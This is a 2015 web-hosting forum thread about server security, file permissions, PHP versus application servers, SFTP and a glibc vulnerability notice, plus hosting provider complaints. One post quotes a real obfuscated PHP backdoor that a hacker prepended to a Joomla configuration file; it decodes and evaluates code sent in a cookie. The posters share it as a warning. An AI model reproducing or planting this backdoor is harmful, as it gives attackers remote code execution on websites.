|
You're absolutely right. We're increasing our online presence without having anyone on-staff to manage it or make sure we are protected. As an organization with an online shop, we are also being extremely irresponsible with customer data. Thanks so much for all of the advice you have given me so far.
|
# ? Jan 17, 2015 01:05 |
|
|
# ? May 29, 2024 03:10 |
|
Just spun up a vm on vultr, it's way, way faster than my digital ocean node, even taking into account 512mb vs 768mb
|
# ? Jan 18, 2015 16:43 |
|
Skywalker OG posted:You're absolutely right. We're increasing our online presence without having anyone on-staff to manage it or make sure we are protected. As an organization with an online shop, we are also being extremely irresponsible with customer data. Thanks so much for all of the advice you have given me so far. Just to give you an idea of the sophistication now, this is a client's configuration file modified by a hacker that I came across today via feedback loop: php:<?php $sF="PCT4BA6ODSE_"; $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10]. $sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1]. $sF[7].$sF[8].$sF[10]); $s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]); if (isset(${$s20}['n88b749'])) { eval($s21(${$s20}['n88b749']));}?><?php class JConfig { public $offline = '0'; public $offline_message = 'This site is down for ma Typically it's one line, but I had to break it into a few lines to make it play nice with the forums. The only reason why this happened is because the file is permitted alteration, by the web server user, by its permissions (client got lazy and applied 777 to all files). If the file had permissions 755, and a different owner than that under which the web server runs, then the web server could have read it, but not modified it. With Hostgator and other EIG brands, you lose this added security, because the attack happens under the same user as the rest of your files. Unless you enumerate every file and scan for anomalous changes (like this), then there's no guarantee your frontend software is safe. nem fucked around with this message at 09:51 on Jan 19, 2015 |
# ? Jan 19, 2015 01:23 |
|
That garbage is why I will always maintain that CGI based applications are terrible and need to go away. Yes, that means PHP in its entirety needs to go away. CGI is fundamentally flawed in this context. It should never be possible to execute a goddamn image, or arbitrary user-uploaded file. It's meant for quick and dirty scripts to be executable in a web directory, not for building entire applications. People should really start using real toolkits and running actual application servers instead of trying to shoehorn big applications into CGI. There's simply too many potential entry points to code execution with the CGI model, and nearly every case of someone's site getting owned can be traced back to some script being executed that shouldn't have been executed directly, but was able to be executed because CGI, execute all the things!
|
# ? Jan 19, 2015 01:46 |
|
Sooooooo, CGI is the problem instead of 0777 permissions? Proper file ownership and permissions go a long, long way towards making even the most stupid vulnerability in anything less likely to exploit the entire machine instead of just the one account. So many hosts get this wrong that creators of scripts designed for shared hosting often have to actively recommend insecure permissions just to work around file ownership stupidity. It's a self perpetuating problem, no matter what language the offending scripts are written in, no matter how they interface with the rest of the system, CGI, WSGI, PSGI, FastCGI, whatever bullshit Java does, whatever.
|
# ? Jan 20, 2015 08:23 |
|
Modern webapps don't even usually have public "files", you configure two virtual hosts, one for static in a /uploads directory that doesn't execute any form of scripting, and every other request pipes into /index.php bootstrapper
|
# ? Jan 20, 2015 11:49 |
|
McGlockenshire posted:Sooooooo, CGI is the problem instead of 0777 permissions? No, the issue is any system in which the web server or process lifecycle operates under the same user that is privileged with access to the rest of the user's files. CGI/FCGI/FPM whatever wrapper you're using that switches users to process a request is vulnerable. That approach, common among hosting companies, is as insecure as setting permissions to 777. Damage scope is changed (all your files vs all of someone else's). 777 is bad because members of your group can run amok and modify any of your files. 717 works, if you keep 1 user, the web server in the other group, because there are no other members of the other group that can touch your assets. Sometimes 777 doesn't work because it's a mixed environment of other users. In those cases, you should use run the web server as a separate user and grant write permissions through ACLs to those files which the web server must write/modify, e.g.: code:
code:
It's not perfect, but it's pretty close to being so.
|
# ? Jan 20, 2015 16:12 |
|
nem posted:No, the issue is any system in which the web server or process lifecycle operates under the same user that is privileged with access to the rest of the user's files. CGI/FCGI/FPM whatever wrapper you're using that switches users to process a request is vulnerable. That approach, common among hosting companies, is as insecure as setting permissions to 777. Damage scope is changed (all your files vs all of someone else's). Alternately people can stop being scared of it and write proper contexts for selinux and take care of an awful lot of issues right there.
|
# ? Jan 20, 2015 16:34 |
|
McGlockenshire posted:Sooooooo, CGI is the problem instead of 0777 permissions? Proper filesystem permissions are absolutely important. However, avoiding a system in which your stack will execute arbitrary scripts that get uploaded, instead executing an application server with a single known entry point which speaks HTTP or another protocol designed for this purpose, eliminates a *lot* of problems. You can attain similar stuff with .htaccess hackery, but you shouldn't even have to do that. When your application is an actual program running on the server that speaks to your web server directly, you're not going to have the web server executing some arbitrary script that some kid just managed to get written out in your web root, because the web server is configured in such a way that CGI-style execution is completely disabled. Uploaded files simply cannot get executed, because you're not passing any old script that matches a certain file extension to a script handler. Now someone would have to somehow write out code into the application itself (which is forbidden by your proper FS permissions), but beyond that, do so in such a way that the application would actually load it. Real application servers don't compile code for every request, so it wouldn't get loaded until the application server restarts - and when using a proper deploy process, you're completely trashing your old web directory and loading a fresh copy every time you deploy, so that code would get blown out at the next deploy and very likely never loaded since you only restart the app server under three conditions: deploys (frequent), reboots (rare), and crashes (rare). The mere idea of compiling your entire application for every request boggles my mind. Why would anyone ever think that's a good idea? That compile-for-every-request lifecycle lead to this crazy ecosystem of opcode caches to try to alleviate the pain of compiling your site for every request, and those opcode caches have a tendency to get corrupted or otherwise break functionality. Why not just use a sane language and architecture to begin with? Thalagyrt fucked around with this message at 17:24 on Jan 20, 2015 |
# ? Jan 20, 2015 17:16 |
|
tl;dr, php sucks, use anything else http://www.thalagyrtlovesphp.com/
|
# ? Jan 20, 2015 17:32 |
|
DarkLotus posted:tl;dr, php sucks, use anything else
|
# ? Jan 20, 2015 17:33 |
|
DarkLotus posted:tl;dr, php sucks, use anything else Hello Dear, I am wanting to make Site like Facebook using the PHP. I am offer 15$ You can make the Codes? It will success For sure.
|
# ? Jan 20, 2015 18:19 |
|
Croc Monster posted:
Hi yes $25 and I guarantee you get all Codes in 4 hours. Please to be paying with the PayPal. I will kindly await you to revert back ASAP. Thalagyrt fucked around with this message at 18:29 on Jan 20, 2015 |
# ? Jan 20, 2015 18:25 |
|
Croc Monster posted:
Excellent response, thank you for making my day
|
# ? Jan 20, 2015 18:28 |
|
nem posted:777 is bad because members of your group can run amok and modify any of your files. 717 works, if you keep 1 user, the web server in the other group, because there are no other members of the other group that can touch your assets. On a multi-user system, you probably don't want to make something world-writeable if your already concerned about it being group-writeable.
|
# ? Jan 26, 2015 23:41 |
|
DarkLotus posted:On a multi-user system, you probably don't want to make something world-writeable if your already concerned about it being group-writeable. Depends upon setup: as long as every user with access to a particular filesystem slice is part of the group, except for one user, the web user, then 717 works. 1 would be applied to group, 7 to others not matched in the group per discretionary access control implementation. It's a dumbed-down version; ACLs or SELinux are better, albeit more intense, options. Once you have another user outside that group with the same filesystem visibility, then 717 fails. It requires a combination of jailing and application access restrictions to properly implement. \/ - ACLs (setfacl command) and SELinux. Setup works great on a VPS. Not so much for massive hosting companies without the tweaks as noted above. nem fucked around with this message at 01:50 on Jan 27, 2015 |
# ? Jan 27, 2015 00:38 |
|
That's one hell of a specific, fragile scenario you've just invented and I think people itt would be best advised not to chmod anything to 717 ever because there is almost certainly a better solution
|
# ? Jan 27, 2015 01:25 |
|
Rufus Ping posted:That's one hell of a specific, fragile scenario you've just invented and I think people itt would be best advised not to chmod anything to 717 ever because there is almost certainly a better solution Yeah, this exactly. That's far too prone to screwups for me to ever consider doing. Use ACLs instead.
|
# ? Jan 27, 2015 01:55 |
|
nem posted:For example, when setting up WordPress the best things you can do from a security standpoint are: I've not used WordPress in quite sometime, but I remember having to set-up sFTP for a number of clients via the "Dashboard" for plugins/updates and such, and it being a pain in the balls. If you have an open FTP and not utilizing sFTP what's the point? Unless I'm missing something, in which case eightysixed derps all day every day.
|
# ? Jan 27, 2015 02:38 |
|
eightysixed posted:I've not used WordPress in quite sometime, but I remember having to set-up sFTP for a number of clients via the "Dashboard" for plugins/updates and such, and it being a pain in the balls. If you have an open FTP and not utilizing sFTP what's the point? Unless I'm missing something, in which case eightysixed derps all day every day. Depends, again, on the circumstances. If the FTP hostname isn't "localhost", then the FTP server may reside outside the server and network traffic will pass outside the server onto the network, liable to be sniffed. If the FTP server resides on the same server as WordPress, then use localhost. Traffic won't pass outside the server, unless the server is compromised, and a privileged user is capturing local traffic, if so, then you've got bigger issues on your hands with possible rooting. FTP password in that case will pass on a TCP socket connected locally on the server bypassing switch. SFTP requires ssh as a wrapper, so there's a dependency upon the host to support ssh on the account. I hope in some time that WordPress will integrate Auth TLS support into its built-in FTP client. That solves the issue of encrypting the endpoint without relying on ssh. If you're going over an insecure, public connection with WordPress, then your wp-admin portal should be secured with SSL. That way not only is your admin password encrypted, but also your FTP credentials. Using FTP, and running a separate web server, creates a permission partition between what you can access and the web server. It's the same reason we have UAC in Windows edit: nuances nem fucked around with this message at 19:54 on Jan 27, 2015 |
# ? Jan 27, 2015 05:24 |
|
nem posted:Depends, again, on the circumstances. If the FTP hostname isn't "localhost", then the FTP server may reside outside the server and network traffic will pass outside the server onto the network, liable to be sniffed. If the FTP server resides on the same server as WordPress, then use localhost. Traffic won't pass outside the server, unless the server is stuck in promiscuous mode and, if so, then you've got bigger issues on your hands with possible rooting. FTP password in that case will pass on a socket connected locally on the server bypassing switch. SFTP requires ssh as a wrapper around the FTP protocol, so there's a dependency upon the host to support ssh on the account. I hope in some time that WordPress will integrate Auth TLS support into its built-in FTP client. That solves the issue of encrypting the endpoint without relying on ssh. SFTP is not SSH wrapped around FTP. SFTP is a completely different protocol that's built into SSH. The only thing it has in common is the name. It's like Java and JavaScript.
|
# ? Jan 27, 2015 18:03 |
|
also what you said about promiscuous mode is wrong, promisc is just like an inbound mac address filter and has nothing to do with traffic 'escaping'
|
# ? Jan 27, 2015 18:28 |
|
/\ - true, sniffing in this case. In either situation, there's someone on the server listening to traffic with elevated privileges.Thalagyrt posted:SFTP is not SSH wrapped around FTP. SFTP is a completely different protocol that's built into SSH. The only thing it has in common is the name. It's like Java and JavaScript. It ships with openssh and on vanilla Linux platforms ties into the sshd PAM provider. Sure, you can separate these two, but going back again to contrived scenarios I don't think most providers will go through the hoops to separate ssh and sftp-server. 90% of those layouts will look like: code:
nem fucked around with this message at 18:55 on Jan 27, 2015 |
# ? Jan 27, 2015 18:39 |
|
nem posted:/\ - true, sniffing in this case. In either situation, there's someone on the server listening to traffic with elevated privileges. I was specifically addressing this: quote:SFTP requires ssh as a wrapper around the FTP protocol which is absolutely incorrect. sftp-server is not in any way shape or form an implementation of the FTP protocol. SFTP and FTP are like Java and JavaScript - similar in name only.
|
# ? Jan 27, 2015 19:18 |
|
Thalagyrt posted:I was specifically addressing this: need coffee
|
# ? Jan 27, 2015 19:23 |
|
Rufus Ping posted:also what you said about promiscuous mode is wrong, promisc is just like an inbound mac address filter and has nothing to do with traffic 'escaping' To add onto this, promiscuous mode also doesn't guarantee that the switch will send all traffic that passes through it to your port. It's really most useful if you're hooked up to a hub (which you're probably not) or if the switch has been configured to mirror all traffic that passes through it to your port, which is most commonly done for IDS type devices or when you're trying to diagnose a connectivity issue. It definitely doesn't under any circumstances mean "the host is going to send all traffic destined for the local machine out over all ethernet devices". The kernel's network routing simply doesn't work that way. If traffic is destined for an IP address that's bound to a local interface it takes a short circuit path through the network stack and bypasses layer 2 entirely. Thalagyrt fucked around with this message at 19:49 on Jan 27, 2015 |
# ? Jan 27, 2015 19:46 |
|
nem posted:/\ - true, sniffing in this case. In either situation, there's someone on the server listening to traffic with elevated privileges. you seem to be confusing promiscuous mode with CAP_NET_RAW or something. The NIC being in promisc mode does not enable anyone on the same box to listen in on your FTP connections, as you seem to be suggesting
|
# ? Jan 27, 2015 19:48 |
|
Being promiscuous makes you more likely to get viruses.
|
# ? Jan 27, 2015 19:50 |
|
Rufus Ping posted:you seem to be confusing promiscuous mode with CAP_NET_RAW or something. The NIC being in promisc mode does not enable anyone on the same box to listen in on your FTP connections, as you seem to be suggesting Yes, raw traffic capability is a broader, and more suggestive term. Original post has been amended.
|
# ? Jan 27, 2015 19:53 |
|
Big CVE today affecting versions of glibc < May 2013. It wasn't marked as a security patch back then, so it didn't get backported. Ubuntu <= 13.04 is impacted, and patches exist for 10.04 and 12.04 LTS. Debian 7 is also impacted, and patches are mainlined. Patches are out for RHEL 5 and 6. RHEL 7 is not impacted. CentOS has not yet released patches, and it's safe to say their downstreams haven't either. The bug is remote code execution in gethostbyname(), so this is an exploit that could potentially allow an attacker to gain remote code execution by sending you a malicious email, as one example. This patch requires a reboot to ensure that all processes linking glibc get updated. Since init links glibc, you need to restart init, which means a reboot. I'll post again once CentOS updates have been released.
|
# ? Jan 27, 2015 22:35 |
|
14.04 LTS 4lyfe For once I don't have to do anything.
|
# ? Jan 28, 2015 01:10 |
|
What the hell is up with Bounceweb? My wife's website has slowed to a crawl, its a rather light little WP page for her business. Takes about 15 seconds to load even the dashboard is slow, i've disabled plugins to see if that was the issue, nope. I didn't know there was an issue until google adwords stopped our advertising because the site was too slow, 3 months ago. Bounce web keeps telling me that nothing is wrong, but I suspect their cpus are overloaded pieces of poo poo. I also see it is no longer on the goon list. Awesome.
|
# ? Jan 29, 2015 05:42 |
|
from what i remember it's always been a lovely "UNLIMITED EVERYTHING PREPAY 10 YEAR DISCOUNT PRICES SHOWN" thing with a user that just registered to post it and not much else
|
# ? Jan 29, 2015 05:56 |
|
Biowarfare posted:from what i remember it's always been a lovely "UNLIMITED EVERYTHING PREPAY 10 YEAR DISCOUNT PRICES SHOWN" thing with a user that just registered to post it and not much else guess I'll move it. The bitch is the domain is through them, and I hate dealing with domain transfers.
|
# ? Jan 29, 2015 06:05 |
|
Aeka 2.0 posted:guess I'll move it. The bitch is the domain is through them, and I hate dealing with domain transfers. Good luck, BounceWeb does not respond to requests for EPP codes unless something has changed in the last several months... I've helped plenty of goons get out of there. Not all of them came to Lithium, but I felt like someone needed to help people get away from Bounceweb. If you have troubles, shoot me a PM and I'll try and work some magic with enom.
|
# ? Jan 29, 2015 06:14 |
|
DarkLotus posted:Good luck, BounceWeb does not respond to requests for EPP codes unless something has changed in the last several months... sending PM.
|
# ? Jan 29, 2015 06:37 |
|
Just in case it hasn't been mentioned in the last few pages: PUBLIC SERVICE ANNOUNCEMENT: STAY AWAY FROM BOUNCEWEB!
|
# ? Jan 29, 2015 15:31 |
|
So I've never worked with anything approaching professional webhosting, but the company I work for needs to start a website that is consumer facing and will be Wordpress based with an ecommerce and user management package. We're going to be working with some consultants to get the website designed and built, and they recommended one company for webhosting and I feel like it's a total rip off for what is offered but I'm not an expert in these things. I've compared it to fully dedicated hosting options with HostGator, Arvixe, InMotion, and Dreamhost, and their option (which is through a company called Trioptek) is about 30% higher than the next lowest. Here's their quote for hosting through Trioptek quote:Tier 1 Dedicated Virtual Server Environment So am I right in feeling like we're being setup to get fleeced here? e: I'm going to reach out to RackSpace since they're recommended in the OP and get a quote. SpartanIvy fucked around with this message at 16:49 on Jan 29, 2015 |
# ? Jan 29, 2015 16:45 |
|
for that price i'd expect rackspace.. its not bad, but its not good, assuming truly proactive 24/7 sla'd support and full management. 10mbps can be completely exhausted by a single home connection..
|
# ? Jan 29, 2015 16:51 |
|
|
# ? May 29, 2024 03:10 |
|
SpartanIV posted:Here's their quote for hosting through Trioptek bahahaha How many users are you planning on having at one time? We ran 10 interactive Ruby on Rails apps with 25,000 users a day on a system like that. You could handle wordpress and ecommerce on a 1 or 2 gb linode. How many orders a day? How many visitors?
|
# ? Jan 29, 2015 17:09 |